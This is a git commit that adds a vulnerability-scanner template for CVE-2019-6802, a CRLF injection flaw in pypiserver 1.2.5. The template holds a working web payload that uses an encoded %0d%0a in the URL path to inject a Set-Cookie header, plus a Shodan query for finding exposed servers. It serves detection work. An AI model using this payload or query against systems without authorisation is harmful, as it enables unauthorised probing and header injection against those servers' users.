Merge pull request #6237 from Akokonunes/patch-189

Create CVE-2019-6802.yaml
2022-12-08 14:55:07 +05:30 · 2022-12-08 14:55:07 +05:30 · 116e7f6d0d
parent 46d0a3aad4 d96973641d
commit 116e7f6d0d
1 changed files with 28 additions and 0 deletions
--- a/cves/2019/CVE-2019-6802.yaml
+++ b/cves/2019/CVE-2019-6802.yaml
@ -0,0 +1,28 @@
+id: CVE-2019-6802
+
+info:
+  name: Pypiserver 1.2.5 - CRLF Injection
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    CRLF Injection in pypiserver 1.2.5 and below allows attackers to set arbitrary HTTP headers and possibly conduct XSS attacks via a %0d%0a in a URI
+  reference:
+    - https://vuldb.com/?id.130257
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-6802
+  classification:
+    cve-id: CVE-2019-6802
+  metadata:
+    verified: true
+    shodan-query: html:"pypiserver"
+  tags: cve,cve2019,crlf,generic,pypiserver
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/%0d%0aSet-Cookie:crlfinjection=1;"
+
+    matchers:
+      - type: word
+        part: header
+        words:
+          - 'Set-Cookie: crlfinjection=1;'